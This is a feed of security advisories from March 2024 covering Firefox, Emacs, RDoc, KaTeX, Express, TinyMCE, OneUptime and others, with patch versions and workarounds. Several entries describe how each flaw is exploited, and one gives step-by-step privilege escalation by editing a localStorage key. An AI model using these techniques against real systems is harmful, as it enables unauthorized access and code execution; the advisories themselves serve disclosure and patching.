23.03.2024 21:41:05	slackware	[SSA:2024-083-01] mozilla-firefox	New mozilla-firefox packages are available for Slackware 15.0 and -current tofix a security issue.Here are the details from the Slackware 15.0 ChangeLog```patches/packages/mozilla-firefox-115.9.1esr-i686-1_slack15.0.txz: Upgraded. This update fixes a critical security issue: An attacker was able to inject an event handler into a privileged object that would allow arbitrary JavaScript execution in the parent process. For more information, see: https://www.mozilla.org/en-US/firefox/115.9.1esr/releasenotes/ https://www.mozilla.org/security/advisories/mfsa2024-16/ https://www.cve.org/CVERecord?id=CVE-2024-29944 (* Security fix )```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated package for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/mozilla-firefox-115.9.1esr-i686-1_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/mozilla-firefox-115.9.1esr-x86_64-1_slack15.0.txzUpdated package for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/mozilla-firefox-115.9.1esr-i686-1.txzUpdated package for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/mozilla-firefox-115.9.1esr-x86_64-1.txzMD5 signaturesSlackware 15.0 package:99c90f4ea4e3ed0fd8ba2ef14c0d8a83 mozilla-firefox-115.9.1esr-i686-1_slack15.0.txzSlackware x86_64 15.0 package:44a7a466cdfff46a159fb5a0e2519f7c mozilla-firefox-115.9.1esr-x86_64-1_slack15.0.txzSlackware -current package:b7633f0ba237545172c1854369502dce xap/mozilla-firefox-115.9.1esr-i686-1.txzSlackware x86_64 -current package:5ac5ad1d77f88975c6f0ea787865123c xap/mozilla-firefox-115.9.1esr-x86_64-1.txzInstallation instructions*Upgrade the package as root:`# upgradepkg mozilla-firefox-115.9.1esr-i686-1_slack15.0.txz`	https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-083-01
23.03.2024 02:00:00	debian	[DSA-5645-1] firefox-esr	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5645-1
24.03.2024 20:25:32	slackware	[SSA:2024-084-01] emacs (high)	New emacs packages are available for Slackware 15.0 and -current tofix security issues.Here are the details from the Slackware 15.0 ChangeLog```patches/packages/emacs-29.3-i586-1_slack15.0.txz: Upgraded. GNU Emacs through 28.2 allows attackers to execute commands via shell metacharacters in the name of a source-code file, because lib-src/etags.c uses the system C library function in its implementation of the ctags program. For example, a victim may use the "ctags " command (suggested in the ctags documentation) in a situation where the current working directory has contents that depend on untrusted input. For more information, see: https://www.cve.org/CVERecord?id=CVE-2022-45939 ( Security fix )```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated package for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/emacs-29.3-i586-1_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/emacs-29.3-x86_64-1_slack15.0.txzUpdated package for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/e/emacs-29.3-i586-1.txzUpdated package for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/e/emacs-29.3-x86_64-1.txzMD5 signaturesSlackware 15.0 package:8bc1c8849d6487b3edd7ddec5d006cc6 emacs-29.3-i586-1_slack15.0.txzSlackware x86_64 15.0 package:4849c24a9f196f58e67fcb01da4d124e emacs-29.3-x86_64-1_slack15.0.txzSlackware -current package:a056d1a49f5570b1d598f1c5ebc14077 e/emacs-29.3-i586-1.txzSlackware x86_64 -current package:67ae9819b6728f52705f3a8c56f2d150 e/emacs-29.3-x86_64-1.txzInstallation instructions*Upgrade the package as root:`# upgradepkg emacs-29.3-i586-1_slack15.0.txz`	https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-084-01
24.03.2024 02:00:00	debian	[DSA-5646-1] cacti (high)	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5646-1
24.03.2024 02:00:00	debian	[DSA-5647-1] samba (high)	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5647-1
24.03.2024 22:23:59	maven	[MAVEN:GHSA-7F88-5HHX-67M2] XNIO denial of service vulnerability (high)	A flaw was found in XNIO. The XNIO NotifierState that can cause a Stack Overflow Exception when the chain of notifier states becomes problematically large can lead to uncontrolled resource management and a possible denial of service (DoS). Version 3.8.14.Final is expected to contain a fix.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-7F88-5HHX-67M2
25.03.2024 02:46:36	rubysec	[RUBYSEC:RDOC-2024-27281] RCE vulnerability with .rdoc_options in RDoc	An issue was discovered in RDoc 6.3.3 through 6.6.2, as distributed in Ruby3.x through 3.3.0.When parsing `.rdoc_options` (used for configuration in RDoc) as a YAML file,object injection and resultant remote code execution are possible becausethere are no restrictions on the classes that can be restored.When loading the documentation cache, object injection and resultant remotecode execution are also possible if there were a crafted cache.We recommend to update the RDoc gem to version 6.6.3.1 or later. In order toensure compatibility with bundled version in older Ruby series, you mayupdate as follows instead:* For Ruby 3.0 users: Update to `rdoc` 6.3.4.1* For Ruby 3.1 users: Update to `rdoc` 6.4.1.1* For Ruby 3.2 users: Update to `rdoc` 6.5.1.1You can use `gem update rdoc` to update it. If you are using bundler, pleaseadd `gem "rdoc", ">= 6.6.3.1"` to your `Gemfile`.Note: 6.3.4, 6.4.1, 6.5.1 and 6.6.3 have a incorrect fix. We recommend toupgrade 6.3.4.1, 6.4.1.1, 6.5.1.1 and 6.6.3.1 instead of them.	https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:RDOC-2024-27281
25.03.2024 02:43:41	rubysec	[RUBYSEC:STRINGIO-2024-27280] Buffer overread vulnerability in StringIO	An issue was discovered in StringIO 3.0.1, as distributed in Ruby 3.0.xthrough 3.0.6 and 3.1.x through 3.1.4.The `ungetbyte` and `ungetc` methods on a StringIO can read past the end of astring, and a subsequent call to `StringIO.gets` may return the memory value.This vulnerability is not affected StringIO 3.0.3 and later, and Ruby 3.2.xand later.We recommend to update the StringIO gem to version 3.0.3 or later. In order toensure compatibility with bundled version in older Ruby series, you may updateas follows instead:* For Ruby 3.0 users: Update to `stringio` 3.0.1.1* For Ruby 3.1 users: Update to `stringio` 3.0.1.2You can use `gem update stringio` to update it. If you are using bundler,please add `gem "stringio", ">= 3.0.1.2"` to your `Gemfile`.	https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:STRINGIO-2024-27280
26.03.2024 01:59:32	ubuntu	[USN-6716-1] Linux kernel (Azure) vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6716-1
26.03.2024 01:58:12	ubuntu	[USN-6701-3] Linux kernel vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6701-3
26.03.2024 01:24:11	ubuntu	[USN-6704-3] Linux kernel (Oracle) vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6704-3
26.03.2024 01:07:30	ubuntu	[USN-6707-3] Linux kernel (AWS) vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6707-3
26.03.2024 00:31:42	maven	[MAVEN:GHSA-5JPM-X58V-624V] Netty's HttpPostRequestDecoder can OOM (moderate)	### SummaryThe `HttpPostRequestDecoder` can be tricked to accumulate data. I have spotted currently two attack vectors ### Details1. While the decoder can store items on the disk if configured so, there are no limits to the number of fields the form can have, an attacher can send a chunked post consisting of many small fields that will be accumulated in the `bodyListHttpData` list.2. The decoder cumulates bytes in the `undecodedChunk` buffer until it can decode a field, this field can cumulate data without limits### PoCHere is a Netty branch that provides a fix + tests : https://github.com/vietj/netty/tree/post-request-decoderHere is a reproducer with Vert.x (which uses this decoder) https://gist.github.com/vietj/f558b8ea81ec6505f1e9a6ca283c9ae3### ImpactAny Netty based HTTP server that uses the `HttpPostRequestDecoder` to decode a form.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-5JPM-X58V-624V
26.03.2024 00:25:02	npm	[NPM:GHSA-RV95-896H-C2VC] Express.js Open Redirect in malformed URLs (moderate)	### ImpactVersions of Express.js prior to 4.19.2 and pre-release alpha and beta versions before 5.0.0-beta.3 are affected by an open redirect vulnerability using malformed URLs.When a user of Express performs a redirect using a user-provided URL Express performs an encode [using `encodeurl`](https://github.com/pillarjs/encodeurl) on the contents before passing it to the `location` header. This can cause malformed URLs to be evaluated in unexpected ways by common redirect allow list implementations in Express applications, leading to an Open Redirect via bypass of a properly implemented allow list.The main method impacted is `res.location()` but this is also called from within `res.redirect()`.### Patcheshttps://github.com/expressjs/express/commit/0867302ddbde0e9463d0564fea5861feb708c2ddhttps://github.com/expressjs/express/commit/0b746953c4bd8e377123527db11f9cd866e39f94An initial fix went out with `express@4.19.0`, we then patched a feature regression in `4.19.1` and added improved handling for the bypass in `4.19.2`.### WorkaroundsThe fix for this involves pre-parsing the url string with either `require('node:url').parse` or `new URL`. These are steps you can take on your own before passing the user input string to `res.location` or `res.redirect`.### Referenceshttps://github.com/expressjs/express/pull/5539https://github.com/koajs/koa/issues/1800https://expressjs.com/en/4x/api.html#res.location	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-RV95-896H-C2VC
26.03.2024 00:32:12	npm	[NPM:GHSA-3WC5-FCW2-2329] KaTeX missing normalization of the protocol in URLs allows bypassing forbidden protocols (moderate)	### ImpactCode that uses KaTeX's `trust` option, specifically that provides a function to block-list certain URL protocols, can be fooled by URLs in malicious inputs that use uppercase characters in the protocol. In particular, this can allow for malicious input to generate `javascript:` links in the output, even if the `trust` function tries to forbid this protocol via `trust: (context) => context.protocol !== 'javascript'`.### PatchesUpgrade to KaTeX v0.16.10 to remove this vulnerability.### Workarounds* Allow-list instead of block protocols in your `trust` function.* Manually lowercase `context.protocol` via `context.protocol.toLowerCase()` before attempting to check for certain protocols.* Avoid use of or turn off the `trust` option.### DetailsKaTeX did not normalize the `protocol` entry of the `context` object provided to a user-specified `trust`-function, so it could be a mix of lowercase and/or uppercase letters.It is generally better to allow-list by protocol, in which case this would normally not be an issue. But in some cases, you might want to block-list, and the [KaTeX documentation](https://katex.org/docs/options.html) even provides such an example:> Allow all commands but forbid specific protocol: `trust: (context) => context.protocol !== 'file'`Currently KaTeX internally sees `file:` and `File:` URLs as different protocols, so `context.protocol` can be `file` or `File`, so the above check does not suffice. A simple workaround would be:> `trust: (context) => context.protocol.toLowerCase() !== 'file'`Most URL parsers normalize the scheme to lowercase. For example, [RFC3986](https://datatracker.ietf.org/doc/html/rfc3986#section-3.1) says:> Although schemes are case-insensitive, the canonical form is lowercase and documents that specify schemes must do so with lowercase letters. An implementation should accept uppercase letters as equivalent to lowercase in scheme names (e.g., allow "HTTP" as well as "http") for the sake of robustness but should only produce lowercase scheme names for consistency.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-3WC5-FCW2-2329
26.03.2024 00:32:07	npm	[NPM:GHSA-F98W-7CXR-FF2H] KaTeX's `\includegraphics` does not escape filename (moderate)	### ImpactKaTeX users who render untrusted mathematical expressions could encounter malicious input using `\includegraphics` that runs arbitrary JavaScript, or generate invalid HTML.### PatchesUpgrade to KaTeX v0.16.10 to remove this vulnerability.### Workarounds* Avoid use of or turn off the `trust` option, or set it to forbid `\includegraphics` commands.* Forbid inputs containing the substring `"\\includegraphics"`.* Sanitize HTML output from KaTeX.### Details`\includegraphics` did not properly quote its filename argument, allowing it to generate invalid or malicious HTML that runs scripts.### For more informationIf you have any questions or comments about this advisory:* Open an issue or security advisory in the [KaTeX repository](https://github.com/KaTeX/KaTeX/)* Email us at katex-security@mit.edu	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-F98W-7CXR-FF2H
26.03.2024 00:32:02	npm	[NPM:GHSA-CVR6-37GX-V8WC] KaTeX's maxExpand bypassed by Unicode sub/superscripts (moderate)	### ImpactKaTeX users who render untrusted mathematical expressions could encounter malicious input using `\def` or `\newcommand` that causes a near-infinite loop, despite setting `maxExpand` to avoid such loops. This can be used as an availability attack, where e.g. a client rendering another user's KaTeX input will be unable to use the site due to memory overflow, tying up the main thread, or stack overflow.### PatchesUpgrade to KaTeX v0.16.10 to remove this vulnerability.### WorkaroundsForbid inputs containing any of the characters `₊₋₌₍₎₀₁₂₃₄₅₆₇₈₉ₐₑₕᵢⱼₖₗₘₙₒₚᵣₛₜᵤᵥₓᵦᵧᵨᵩᵪ⁺⁻⁼⁽⁾⁰¹²³⁴⁵⁶⁷⁸⁹ᵃᵇᶜᵈᵉᵍʰⁱʲᵏˡᵐⁿᵒᵖʳˢᵗᵘʷˣʸᶻᵛᵝᵞᵟᵠᵡ` before passing them to KaTeX.(There is no easy workaround for the auto-render extension.)### DetailsKaTeX supports an option named `maxExpand` which aims to prevent infinitely recursive macros from consuming all available memory and/or triggering a stack overflow error. Unfortunately, [support for "Unicode (sub\|super)script characters"](https://github.com/KaTeX/KaTeX/commit/d8fc35e6a97f8e561c723b93ad275cf5a7f3094a) allows an attacker to bypass this limit. Each sub/superscript group instantiated a separate Parser with its own limit on macro executions, without inheriting the current count of macro executions from its parent. This has been corrected in KaTeX v0.16.10.### For more informationIf you have any questions or comments about this advisory:* Open an issue or security advisory in the [KaTeX repository](https://github.com/KaTeX/KaTeX/)* Email us at [katex-security@mit.edu](mailto:katex-security@mit.edu)	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-CVR6-37GX-V8WC
26.03.2024 00:31:57	npm	[NPM:GHSA-64FM-8HW2-V72W] KaTeX's maxExpand bypassed by `\edef` (moderate)	### ImpactKaTeX users who render untrusted mathematical expressions could encounter malicious input using `\edef` that causes a near-infinite loop, despite setting `maxExpand` to avoid such loops. This can be used as an availability attack, where e.g. a client rendering another user's KaTeX input will be unable to use the site due to memory overflow, tying up the main thread, or stack overflow.### PatchesUpgrade to KaTeX v0.16.10 to remove this vulnerability.### WorkaroundsForbid inputs containing the substring `"\\edef"` before passing them to KaTeX.(There is no easy workaround for the auto-render extension.)### DetailsKaTeX supports an option named `maxExpand` which prevents infinitely recursive macros from consuming all available memory and/or triggering a stack overflow error. However, what counted as an "expansion" is a single macro expanding to any number of tokens. The expand-and-define TeX command `\edef` can be used to build up an exponential number of tokens using only a linear number of expansions according to this definition, e.g. by repeatedly doubling the previous definition. This has been corrected in KaTeX v0.16.10, where every expanded token in an `\edef` counts as an expansion.### For more informationIf you have any questions or comments about this advisory:* Open an issue or security advisory in the [KaTeX repository](https://github.com/KaTeX/KaTeX/)* Email us at [katex-security@mit.edu](mailto:katex-security@mit.edu)	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-64FM-8HW2-V72W
25.03.2024 21:37:28	npm	[NPM:GHSA-246P-XMG8-WMCQ] OneUptime Vulnerable to a Privilege Escalation via Local Storage Key Manipulation (high)	## SummaryA security vulnerability exists in oneuptime's local storage handling, where a regular user can escalate privileges by modifying the `is_master_admin` key to `true`. This allows unauthorized access to administrative functionalities.## DetailsThe vulnerability lies in the improper validation of client-side stored data within the web application. Specifically, the `is_master_admin` key, stored in the local storage of the browser, can be manipulated by an attacker. By changing this key from false to true, the application grants administrative privileges to the user, without proper server-side validation. ## POC(I am using Firefox Developer to demonstrate this vulnerability)Log in as a normal user. Open developer tools (hit F12), click Storage, then Local Storage. Modify the `is_master_admin` key from `false` to `true`.## ImpactThis vulnerability represents a high security risk as it allows any authenticated user to gain administrative privileges through client-side manipulation. Most of the admin previlages were disabled except the user list. Where an attacker could see all the list of users who signed up to OneUptome. ## PatchThis has been patched in 7.0.1815	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-246P-XMG8-WMCQ
25.03.2024 17:33:30	ubuntu	[USN-6714-1] Debian Goodies vulnerability (high)	debmany in Debian Goodies could be made to execute arbitrary shellcommands if it received a specially crafted deb file.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6714-1
25.03.2024 21:34:46	npm	[NPM:GHSA-8PPR-WWW8-HFJX] @thi.ng/paths Prototype Pollution vulnerability (high)	An issue in @thi.ng/paths v.5.1.62 and before allows a remote attacker to execute arbitrary code via the `mutIn` and `mutInManyUnsafe` components.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-8PPR-WWW8-HFJX
25.03.2024 14:01:37	ubuntu	[USN-6713-1] QPDF vulnerability	QPDF could be made to crash or run programs if it opened a speciallycrafted file.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6713-1
25.03.2024 13:56:34	ubuntu	[USN-6712-1] Net::CIDR::Lite vulnerability	Net::CIDR::Lite could allow unintended access to network services.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6712-1
25.03.2024 12:51:33	ubuntu	[USN-6711-1] CRM shell vulnerability (high)	CRM shell could be made to execute arbitrary code if it receiveda specially crafted input.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6711-1
25.03.2024 21:36:43	npm	[NPM:GHSA-87QP-7CW8-8Q9C] web3-utils Prototype Pollution vulnerability (high)	Versions of the package web3-utils before 4.2.1 are vulnerable to Prototype Pollution via the utility functions format and mergeDeep, due to insecure recursive merge.An attacker can manipulate an object's prototype, potentially leading to the alteration of the behavior of all objects inheriting from the affected prototype by passing specially crafted input to these functions.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-87QP-7CW8-8Q9C
25.03.2024 03:38:21	ubuntu	[USN-6710-1] Firefox vulnerabilities	Several security issues were fixed in Firefox.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6710-1
25.03.2024 11:14:09	rustsec	[RUSTSEC-2024-0320] yaml-rust is unmaintained.	The maintainer seems [unreachable](https://github.com/chyh1990/yaml-rust/issues/197).Many issues and pull requests have been submitted over the yearswithout any [response](https://github.com/chyh1990/yaml-rust/issues/160).## AlternativesConsider switching to the actively maintained `yaml-rust2` fork of the original project:- [yaml-rust2](https://github.com/Ethiraric/yaml-rust2)- [yaml-rust2 @ crates.io](https://crates.io/crates/yaml-rust2))	https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0320
26.03.2024 23:23:48	npm	[NPM:GHSA-438C-3975-5X3F] TinyMCE Cross-Site Scripting (XSS) vulnerability in handling iframes (moderate)	### ImpactA [cross-site scripting (XSS)](https://owasp.org/www-community/attacks/xss/) vulnerability was discovered in TinyMCE’s content insertion code. This allowed `iframe` elements containing malicious code to execute when inserted into the editor. These `iframe` elements are restricted in their permissions by same-origin browser protections, but could still trigger operations such as downloading of malicious assets.### FixTinyMCE 6.8.1 introduced a new `sandbox_iframes` boolean option which adds the `sandbox=""` attribute to every `iframe` element by default when enabled. This will prevent cross-origin, and in special cases same-origin, XSS by embedded resources in `iframe` elements. From TinyMCE 7.0.0 onwards the default value of this option is `true`.In TinyMCE 7.0.0 a new `sandbox_iframes_exclusions` option was also added, allowing a list of domains to be specified that should be excluded from having the `sandbox=""` attribute applied when the `sandbox_iframes` option is enabled. By default, this option is set to an array of domains that are provided in embed code by popular websites. To sandbox `iframe` elements from every domain, set this option to `[]`.### WorkaroundsThe HTTP Content-Security-Policy (CSP) `frame-src` or `object-src` can be configured to restrict or block the loading of unauthorized URLS. Refer to the [TinyMCE Content Security Policy Guide](https://www.tiny.cloud/docs/tinymce/latest/tinymce-and-csp/).### References- [TinyMCE 6.8.1](https://www.tiny.cloud/docs/tinymce/6/6.8.1-release-notes/#new-convert_unsafe_embeds-option-that-controls-whether-object-and-embed-elements-will-be-converted-to-more-restrictive-alternatives-namely-img-for-image-mime-types-video-for-video-mime-types-audio-audio-mime-types-or-iframe-for-other-or-unspecified-mime-types)- [TinyMCE 7.0.0](https://www.tiny.cloud/docs/tinymce/7/7.0-release-notes/#sandbox_iframes-editor-option-is-now-defaulted-to-true)	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-438C-3975-5X3F
26.03.2024 10:51:04	ubuntu	[USN-6717-1] Thunderbird vulnerabilities (high)	Several security issues were fixed in Thunderbird.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6717-1
26.03.2024 10:15:35	alpinelinux	[ALPINE:CVE-2023-6175] wireshark vulnerability (high)	[From CVE-2023-6175] NetScreen file parser crash in Wireshark 4.0.0 to 4.0.10 and 3.6.0 to 3.6.18 allows denial of service via crafted capture file	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-6175
26.03.2024 10:09:02	ubuntu	[USN-6588-2] PAM vulnerability (medium)	PAM could be made to stop responding if it opened a specially crafted file.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6588-2
26.03.2024 02:00:00	cisa	[CISA-2024:0326] CISA Adds One Known Exploited Vulnerability to Catalog (high)	CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.	https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0326
26.03.2024 02:00:00	oraclelinux	[ELSA-2024-1485] firefox security update (critical)	[115.9.1.0.1]- Add firefox-oracle-default-prefs.js and remove the corresponding OpenELA file[115.9.1]- Add debranding patches (Mustafa Gezen)- Add OpenELA default preferences (Louis Abel)[115.9.1-1]- Update to 115.9.1[115.9.0-2]- Update to 115.9.0 build2[115.9.0-1]- Update to 115.9.0 build1- Fix expat CVE-2023-52425	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-1485
26.03.2024 02:00:00	oraclelinux	[ELSA-2024-1486] firefox security update (critical)	[115.9.1-1.0.1]- Remove upstream references [Orabug: 30143292]- Update distribution for Oracle Linux [Orabug: 30143292]- Add firefox-oracle-default-prefs.js and remove the corresponding Red Hat file[115.9.1-1]- Update to 115.9.1[115.9.0-2]- Update to 115.9.0 build2[115.9.0-1]- Update to 115.9.0 build1- Fix expat CVE-2023-52425	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-1486
26.03.2024 02:00:00	oraclelinux	[ELSA-2024-1493] thunderbird security update (moderate)	[115.9.0-1.0.1]- Add Oracle prefs[115.9.0-1]- Update to 115.9.0 build1- Fix expat CVE-2023-52425	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-1493
26.03.2024 02:00:00	oraclelinux	[ELSA-2024-1501] grafana security update (important)	[9.2.10-8]- Rebuild with latest version of golang- resolve RHEL-24313	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-1501
26.03.2024 02:00:00	oraclelinux	[ELSA-2024-1502] grafana-pcp security update (important)	[5.1.1-2]- Rebuild with latest version of golang- resolves CVE-CVE-2024-1394	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-1502
26.03.2024 02:00:00	oraclelinux	[ELSA-2024-1503] nodejs:18 security update (important)	nodejs[1:18.19.1-1]- Rebase to version 18.19.1- Fixes: CVE-2024-21892 CVE-2024-22019 (high)- Fixes: CVE-2023-46809 (medium)nodejs-nodemonnodejs-packaging	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-1503
26.03.2024 02:00:00	redhat	[RHSA-2024:1514] libreoffice security fix update (important)	LibreOffice is an open source, community-developed office productivity suite. It includes key desktop applications, such as a word processor, a spreadsheet, a presentation manager, a formula editor, and a drawing program. LibreOffice replaces OpenOffice and provides a similar but enhanced and extended office suite.Security Fix(es):* libreoffice: Improper Input Validation leading to arbitrary gstreamer plugin execution (CVE-2023-6185)* libreoffice: Insufficient macro permission validation leading to macro execution (CVE-2023-6186)	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1514
26.03.2024 02:00:00	redhat	[RHSA-2024:1530] expat security update (moderate)	Expat is a C library for parsing XML documents.Security Fix(es):* expat: parsing large tokens can trigger a denial of service (CVE-2023-52425)* expat: XML Entity Expansion (CVE-2024-28757)	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1530
26.03.2024 02:00:00	redhat	[RHSA-2024:1510] nodejs:18 security update (important)	Node.js is a software development platform for building fast and scalablenetwork applications in the JavaScript programming language.Security Fix(es):* nodejs: reading unprocessed HTTP request with unbounded chunk extension allows DoS attacks (CVE-2024-22019)* nodejs: vulnerable to timing variant of the Bleichenbacher attack against PKCS#1 v1.5 padding (Marvin) (CVE-2023-46809)* nodejs: code injection and privilege escalation through Linux capabilities (CVE-2024-21892)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1510
27.03.2024 00:44:52	rubysec	[RUBYSEC:CARRIERWAVE-2024-29034] CarrierWave content-Type allowlist bypass vulnerability which possibly leads to XSS remained (medium)	### ImpactThe vulnerability [CVE-2023-49090](https://github.com/carrierwaveuploader/carrierwave/security/advisories/GHSA-gxhx-g4fq-49hj)wasn't fully addressed.This vulnerability is caused by the fact that when uploading toobject storage, including Amazon S3, it is possible to set aContent-Type value that is interpreted by browsers to be differentfrom what's allowed by `content_type_allowlist`, by providingmultiple values separated by commas.This bypassed value can be used to cause XSS.### PatchesUpgrade to [3.0.7](https://rubygems.org/gems/carrierwave/versions/3.0.7) or [2.2.6](https://rubygems.org/gems/carrierwave/versions/2.2.6).### WorkaroundsUse the following monkey patch to let CarrierWave parse theContent-type by using `Marcel::MimeType.for`.```ruby# For CarrierWave 3.xCarrierWave::SanitizedFile.class_eval do def declared_content_type @declared_content_type \|\| if @file.respond_to?(:content_type) && @file.content_type Marcel::MimeType.for(declared_type: @file.content_type.to_s.chomp) end endend``````ruby# For CarrierWave 2.xCarrierWave::SanitizedFile.class_eval do def existing_content_type if @file.respond_to?(:content_type) && @file.content_type Marcel::MimeType.for(declared_type: @file.content_type.to_s.chomp) end endend```### References[OWASP - File Upload Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/File_Upload_Cheat_Sheet.html#content-type-validation)	https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:CARRIERWAVE-2024-29034
26.03.2024 14:14:36	rubysec	[RUBYSEC:RDOC-2024-27281] RCE vulnerability with .rdoc_options in RDoc	An issue was discovered in RDoc 6.3.3 through 6.6.2, as distributed in Ruby3.x through 3.3.0.When parsing `.rdoc_options` (used for configuration in RDoc) as a YAML file,object injection and resultant remote code execution are possible becausethere are no restrictions on the classes that can be restored.When loading the documentation cache, object injection and resultant remotecode execution are also possible if there were a crafted cache.We recommend to update the RDoc gem to version 6.6.3.1 or later. In order toensure compatibility with bundled version in older Ruby series, you mayupdate as follows instead:* For Ruby 3.0 users: Update to `rdoc` 6.3.4.1* For Ruby 3.1 users: Update to `rdoc` 6.4.1.1* For Ruby 3.2 users: Update to `rdoc` 6.5.1.1You can use `gem update rdoc` to update it. If you are using bundler, pleaseadd `gem "rdoc", ">= 6.6.3.1"` to your `Gemfile`.Note: 6.3.4, 6.4.1, 6.5.1 and 6.6.3 have a incorrect fix. We recommend toupgrade 6.3.4.1, 6.4.1.1, 6.5.1.1 and 6.6.3.1 instead of them.	https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:RDOC-2024-27281
26.03.2024 14:14:36	rubysec	[RUBYSEC:STRINGIO-2024-27280] Buffer overread vulnerability in StringIO	An issue was discovered in StringIO 3.0.1, as distributed in Ruby 3.0.xthrough 3.0.6 and 3.1.x through 3.1.4.The `ungetbyte` and `ungetc` methods on a StringIO can read past the end of astring, and a subsequent call to `StringIO.gets` may return the memory value.This vulnerability is not affected StringIO 3.0.3 and later, and Ruby 3.2.xand later.We recommend to update the StringIO gem to version 3.0.3 or later. In order toensure compatibility with bundled version in older Ruby series, you may updateas follows instead:* For Ruby 3.0 users: Update to `stringio` 3.0.1.1* For Ruby 3.1 users: Update to `stringio` 3.0.1.2You can use `gem update stringio` to update it. If you are using bundler,please add `gem "stringio", ">= 3.0.1.2"` to your `Gemfile`.	https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:STRINGIO-2024-27280
27.03.2024 23:57:43	npm	[NPM:GHSA-2G4C-8FPM-C46V] web3-utils Prototype Pollution vulnerability (high)	### Impact: The mergeDeep() function in the web3-utils package has been identified for Prototype Pollution vulnerability. An attacker has the ability to modify an object's prototype, which could result in changing the behavior of all objects that inherit from the impacted prototype by providing carefully crafted input to function.### Patches: It has been fixed in web3-utils version 4.2.1 so all packages and apps depending on web3-utils >=4.0.1 and <=4.2.0 should upgrade to web3-utils 4.2.1.### Workarounds: None	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-2G4C-8FPM-C46V
27.03.2024 23:03:51	ubuntu	[USN-6686-5] Linux kernel (Intel IoTG) vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6686-5
27.03.2024 22:38:24	ubuntu	[USN-6715-1] unixODBC vulnerability (high)	unixODBC could be made to crash or execute arbitrary code.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6715-1
